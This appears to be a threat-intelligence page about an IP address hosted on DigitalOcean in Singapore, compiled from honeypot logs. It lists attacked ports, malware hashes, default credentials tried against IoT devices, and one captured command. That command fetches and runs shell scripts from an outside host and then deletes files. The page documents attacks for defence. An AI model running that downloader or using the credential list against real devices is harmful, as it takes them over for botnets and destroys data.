TROYANOSYVIRUS
Active Threat β€’ HIGH

165.22.252.236

First Detection3/27/2026
Last Activity3/29/2026
ISPDigitalOcean, LLC
🎯
154
Total Attacks
πŸ”Œ
2
Ports
πŸ“‘
2
Attack Types
🦠
2
Malware

Geolocation

Country
πŸ‡ΈπŸ‡¬ Singapore
City
Singapore
ASN
AS14061
ISP
DigitalOcean, LLC

Attack Types

ssh_telnet_honeypot
adb_honeypot

Attacked Ports

235555

Associated Malware

836a7b5f7249e844911c...β†’c78e6c73ac9a847b19d1...β†’

Attempted Credentials

πŸ”root/icatch99
2x
πŸ”root/(empty)
2x
πŸ”admin/admin
2x
πŸ”root/vizxv
1x
πŸ”admin/anko
1x
πŸ”admin/(empty)
1x
πŸ”admin/system
1x
πŸ”root/123456
1x
πŸ”support/support
1x
πŸ”admin/123456
1x
πŸ”root/anko
1x
πŸ”root/86981198
1x
πŸ”telnet/telnet
1x
πŸ”ubnt/ubnt
1x
πŸ”root/toor
1x

Executed Commands

$echo hello3x
$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.22.92/1.sh; curl -O http://206.189.22.92/1.sh; chmod 777 1.sh; sh 1.sh; tftp 206.189.22.92 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 206.189.22.92; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 206.189.22.92 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
47001

Risk Assessment

60
/100
LowMediumHighCritical